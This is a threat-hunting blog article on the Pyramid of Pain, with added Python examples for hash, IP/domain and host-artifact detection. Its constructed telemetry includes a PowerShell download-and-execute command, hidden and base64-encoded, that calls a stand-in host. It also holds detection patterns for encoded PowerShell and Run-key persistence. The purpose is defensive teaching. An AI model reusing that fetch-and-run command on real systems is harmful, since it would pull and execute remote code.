Pyramid of Pain

Urvesh Thakkar
4 min read · Mar 26, 2021

Corporate security has made many strategic advances in its defensive mechanisms and overall tech infrastructure, yet safeguarding an organization's assets from emerging threats remains a real challenge. The Pyramid of Pain was introduced by David J. Bianco to show, for each type of indicator we use to track an adversary, how much pain it causes the adversary when we detect and deny it, which is also, roughly, how hard that indicator is for defenders to collect and use.

The diagram below shows the Pyramid of Pain (the image is not reproduced here; its six levels, from the base to the apex, are):

  Hash Values               Trivial
  IP Addresses              Easy
  Domain Names              Simple
  Network/Host Artifacts    Annoying
  Tools                     Challenging
  TTPs                      Tough!

Each level of the pyramid represents a type of indicator that a security analyst can use during threat hunting to detect an adversary. The higher the level, the more it costs the adversary to change that indicator once we act on it, and the more effort it costs us to collect and use it.

Adversary: the opponent or threat actor. A simple analogy: Batman vs. the Joker (the adversary).

Let's break down each layer of the pyramid, starting from the base:

Trivial | Hash Values — A cryptographic hash (MD5, SHA-1 or SHA-256) identifies one exact file. If an adversary is trying to compromise an endpoint with some type of malware, the first and simplest step for a threat hunter is to take the hash of the suspicious file or running process and check it against antivirus verdicts and threat-intel feeds to learn what the sample is and where it has been seen before. Hashes are precise and easy to share, but they sit at the base of the pyramid because they cost the adversary almost nothing to change: obfuscating, repacking or recompiling the malware, or even appending a single byte, produces a completely different hash with identical behaviour, so a hash-based block lasts only until the next build. Use hashes to confirm and scope a known sample, not as a durable detection.
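To make the "trivial" point concrete, here is an added example (not code from the original article or its author): it hashes two constructed stand-in binaries, matches them against a constructed feed, then shows that appending one byte to the malicious sample defeats that same feed even though the sample would behave exactly as before. The paths, byte strings and feed entry are all invented.

```python
import hashlib

# Constructed sample "files" pulled from an endpoint: byte strings standing in for
# real binaries. Paths and contents are made up for this example.
DROPPER = r"C:\Users\alice\Downloads\invoice.exe"
SAMPLE_FILES = {
    DROPPER: b"MZ\x90\x00stand-in dropper body v1\x00",
    r"C:\Windows\System32\notepad.exe": b"MZ\x90\x00stand-in benign binary\x00",
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed threat-intel feed: pretend it already lists the dropper exactly as first seen.
KNOWN_BAD_SHA256 = {sha256_hex(SAMPLE_FILES[DROPPER])}


def scan(files, feed=KNOWN_BAD_SHA256):
    """The 'trivial' hunt: return every path whose SHA-256 appears in the feed."""
    return [path for path, data in files.items() if sha256_hex(data) in feed]


def adversary_rebuild(data: bytes) -> bytes:
    """Simulate the cheapest possible evasion: append one byte of padding.
    The binary does exactly the same thing, but its hash is now unknown to every feed."""
    return data + b"\x00"


def changed_bits(h1: str, h2: str) -> int:
    """How many of the 256 hash bits differ; for a sound hash roughly half flip on any change."""
    return bin(int(h1, 16) ^ int(h2, 16)).count("1")


def demo():
    first_run = scan(SAMPLE_FILES)                 # the feed matches the original dropper
    rebuilt = dict(SAMPLE_FILES)
    rebuilt[DROPPER] = adversary_rebuild(SAMPLE_FILES[DROPPER])
    second_run = scan(rebuilt)                     # same feed, same malware, no match
    flipped = changed_bits(sha256_hex(SAMPLE_FILES[DROPPER]), sha256_hex(rebuilt[DROPPER]))
    return first_run, second_run, flipped


if __name__ == "__main__":
    before, after, flipped = demo()
    print("hits before rebuild:", before)
    print("hits after rebuild: ", after)
    print("hash bits changed by a one-byte edit:", flipped)
```

The second scan is the whole lesson of this layer: the feed is still correct, the malware is still the same, and the indicator is already useless.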

Each step up the pyramid costs the adversary more to change and costs us more effort to detect. Now consider the next layer.

Easy | IP Addresses — An organization's network hierarchy already defines which IP ranges are sensitive and which systems may reach each operating level. With threat-intel feeds integrated into the SIEM, an analyst can pull the list of known-bad IPs, write a custom rule that alerts whenever an endpoint contacts one of them and, where appropriate, push the same list to the firewall or proxy as a blocklist. That is cheap for us, but it is also cheap for the adversary: moving to a new VPS, proxy, VPN exit or Tor node takes minutes, so expect these indicators to go stale quickly and refresh them from the feed rather than maintaining them by hand.

Simple | Domain Names — Domains are a little more work for the adversary than IPs, because a new one has to be registered (and paid for) and DNS changes take time to propagate; that is why this level is "simple" rather than "easy". They can still be changed at will: attackers register throwaway domains in bulk, use dynamic-DNS providers and generate names algorithmically (DGAs), and they usually hide their command-and-control behind a subdomain of whatever name the feed lists. So the detection methods at this layer are limited but far from useless: DNS resolver logs, web server logs and proxy logs fed into the SIEM or event tracker let you match destination hosts against the feed, provided the match covers subdomains as well as exact names.
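The SIEM-style matching described for the IP layer and the domain layer above, as one added example (not code from the original article or its author): a constructed threat-intel feed with single hosts, a CIDR block and domains is matched against a constructed proxy log. The feed entries use RFC 5737 documentation addresses and invented `.example` names; the log format (`epoch client dest_host dest_ip method url`) is an assumption made for the example, as is the look-alike `evil-c2.example.org` line that a naive substring match would wrongly flag.

```python
import ipaddress

# Constructed threat-intel feed: documentation-range addresses and invented domains.
FEED = {
    "ips": ["203.0.113.7", "198.51.100.0/24"],        # single hosts and CIDR blocks
    "domains": ["evil-c2.example", "updates.bad-cdn.example"],
}

# Constructed proxy log, one request per line:
#   <epoch> <client_ip> <dest_host> <dest_ip> <method> <url>
PROXY_LOG = """\
1616742000 10.0.0.12 www.intranet.example 192.0.2.1 GET http://www.intranet.example/
1616742005 10.0.0.12 beacon.evil-c2.example 203.0.113.7 POST http://beacon.evil-c2.example/gate.php
1616742010 10.0.0.33 cdn.vendor.example 198.51.100.77 GET http://cdn.vendor.example/pkg.zip
1616742015 10.0.0.41 evil-c2.example.org 192.0.2.9 GET http://evil-c2.example.org/
1616742020 10.0.0.41 updates.bad-cdn.example 192.0.2.10 GET http://updates.bad-cdn.example/u
"""


def compile_feed(feed):
    """Turn the feed into objects that are cheap to match against."""
    networks = [(ipaddress.ip_network(e, strict=False), e) for e in feed["ips"]]
    domains = sorted({d.lower().rstrip(".") for d in feed["domains"]})
    return networks, domains


def ip_hits(ip_text, networks):
    """Every feed entry (single host or CIDR block) that contains this address."""
    ip = ipaddress.ip_address(ip_text)
    return [entry for net, entry in networks if ip in net]


def domain_hits(host, domains):
    """Exact match or a subdomain of a listed domain. A plain substring test would also
    flag look-alikes such as 'evil-c2.example.org', which is a different registration."""
    host = host.lower().rstrip(".")
    return [d for d in domains if host == d or host.endswith("." + d)]


def hunt(log_text, feed):
    """Return (client_ip, dest_host, reasons) for every request that touches the feed."""
    networks, domains = compile_feed(feed)
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, dest_host, dest_ip, _method, _url = line.split()
        reasons = [f"ip:{e}" for e in ip_hits(dest_ip, networks)]
        reasons += [f"domain:{d}" for d in domain_hits(dest_host, domains)]
        if reasons:
            findings.append((client, dest_host, reasons))
    return findings


if __name__ == "__main__":
    for client, dest, why in hunt(PROXY_LOG, FEED):
        print(f"{client} -> {dest}: {', '.join(why)}")
```

Three of the five requests fire: the beacon (on both its IP and its parent domain), the download from inside the listed /24, and the second listed domain. The `evil-c2.example.org` request does not, which is the behaviour you want from a domain rule.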

Annoying | Network/Host Artifacts — These are the traces that an adversary's activity leaves on the network or on one or more hosts, as opposed to the infrastructure they connect to. Network artifacts include characteristic URL patterns (a fixed beacon path, say), unusual or spoofed User-Agent strings and other protocol quirks. Host artifacts live on the targeted endpoints: registry values written for persistence, files dropped in predictable locations, malicious use of PowerShell (hidden windows, encoded command lines) and malware that borrows a legitimate process name while running from the wrong directory. Detecting at this level needs continuous, deliberate monitoring of proxy, DNS and endpoint telemetry and a good understanding of what normal looks like on your hosts. It is annoying for the adversary because changing these artifacts means reconfiguring or rewriting part of their tooling rather than just pointing it at a new server.
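An added example of hunting at this layer (not code from the original article or its author): a handful of constructed process-creation and proxy records are checked for the artifacts named above, namely an encoded PowerShell command line (which is decoded so the analyst sees what it does), a well-known system binary name running from the wrong directory, a Run-key persistence write, a User-Agent outside the sanctioned browser families, and a beacon-style URL. The event layout loosely follows the fields Sysmon records for process creation, but every host, user, path, payload and the allow/suspect lists are assumptions made for this example.

```python
import base64
import re

# ---- constructed telemetry (all hosts, users, paths and payloads are made up) ----
PS_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
ENCODED = base64.b64encode(PS_PAYLOAD.encode("utf-16-le")).decode()

# Simplified process-creation events (roughly the fields Sysmon Event ID 1 gives you).
PROCESS_EVENTS = [
    {"host": "WS01", "image": "C:\\Windows\\System32\\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
    {"host": "WS01", "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\svchost.exe",
     "cmdline": "svchost.exe"},
    {"host": "WS02", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"host": "WS03", "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
                "/v Updater /t REG_SZ /d C:\\Users\\bob\\AppData\\Roaming\\updater.exe"},
]

# Simplified proxy records: (host, method, url, user_agent)
HTTP_EVENTS = [
    ("WS01", "GET", "http://intranet.example/home",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/89.0.4389.90 Safari/537.36"),
    ("WS02", "POST", "http://203.0.113.7/gate.php",
     "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"),
    ("WS03", "GET", "http://203.0.113.7/a.ps1", ""),
]

# ---- host artifacts --------------------------------------------------------------
# Directories where the genuine copies of often-impersonated Windows binaries live.
EXPECTED_DIRS = {
    "svchost.exe": ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\"),
    "lsass.exe": ("c:\\windows\\system32\\",),
    "csrss.exe": ("c:\\windows\\system32\\",),
    "explorer.exe": ("c:\\windows\\",),
}
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
RUN_KEY = re.compile(r"(?i)\breg(?:\.exe)?\s+add\s+.*\\currentversion\\run(?:once)?\b")


def decode_encoded_powershell(cmdline):
    """Decode a -EncodedCommand payload (base64 of UTF-16LE text); None if absent or invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_masquerading(image):
    """A well-known system binary name running from a directory it never lives in."""
    path = image.lower()
    expected = EXPECTED_DIRS.get(path.rsplit("\\", 1)[-1])
    return expected is not None and not any(path.startswith(d) for d in expected)


def host_findings(events):
    out = []
    for ev in events:
        if is_masquerading(ev["image"]):
            out.append((ev["host"], "masquerading", ev["image"]))
        decoded = decode_encoded_powershell(ev["cmdline"])
        if decoded is not None:
            out.append((ev["host"], "encoded-powershell", decoded))
        if RUN_KEY.search(ev["cmdline"]):
            out.append((ev["host"], "run-key-persistence", ev["cmdline"]))
    return out


# ---- network artifacts -----------------------------------------------------------
ALLOWED_UA_TOKENS = ("Chrome/", "Firefox/", "Edg/")   # assumed sanctioned browser families
SUSPECT_URL = re.compile(r"(?i)/gate\.php$|\.ps1$")    # assumed beacon/payload URL patterns


def network_findings(events):
    out = []
    for host, _method, url, ua in events:
        if not any(tok in ua for tok in ALLOWED_UA_TOKENS):
            out.append((host, "unexpected-user-agent", ua or "<empty>"))
        if SUSPECT_URL.search(url):
            out.append((host, "suspect-url-pattern", url))
    return out


def hunt():
    return host_findings(PROCESS_EVENTS) + network_findings(HTTP_EVENTS)


if __name__ == "__main__":
    for host, kind, detail in hunt():
        print(f"{host:5} {kind:24} {detail}")
```

None of these checks depends on a hash or an address: the svchost.exe in a Temp folder is caught whatever its hash, and the encoded command is caught whatever server it fetches from. That is why the adversary has to change how the tooling behaves, not just where it points, to get past them.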

Challenging | Tools — The software the adversary uses to carry out the attack: the builder that produces the malware-laden PDF attachments for a multi-phase spear-phishing campaign against end users, the credential-dumping utility, the pass-the-hash implementation, the command-and-control framework. Detecting the tool itself, through signatures for its distinctive code, strings or the artifacts it always leaves behind, forces the adversary to find or write a replacement and learn to use it, which is a real cost. Getting there takes in-depth analysis of recovered samples and expertise in how these tools behave on a host and on the wire.

Tough | TTPs (Tactics, Techniques and Procedures) — This layer describes how the adversary actually operates, at every stage of the intrusion: from reconnaissance through initial access, privilege escalation and lateral movement to the final impact that disrupts the network, there are numerous TTPs an adversary may choose to penetrate your organization. It sits at the top of the pyramid because behaviour is the hardest thing for an adversary to change: if you detect and respond to the technique itself (an Office document spawning a shell, a process reading LSASS memory) rather than to a hash, an address or a particular tool, the adversary has to retrain and retool to keep operating. It is also the hardest layer for defenders, because TTPs are diverse and complex, they evolve, and staying current with them and with which actors use which is a constant effort. Whatever level you operate at, a general understanding of adversaries and their associated TTPs is a must.

Working at this top, hardest layer is where the MITRE ATT&CK framework plays an extremely important role.

OH wait!! Did I mention MITRE ATT&CK? Ahh! Stay tuned for the next article, in which I will explain ATT&CK.

PS: Don't expect me to write everything in one article 😆! Thanks for reading; let me know your doubts and suggestions. Show some love by smashing the 👍 button and share it with your network.

Urvesh Thakkar,
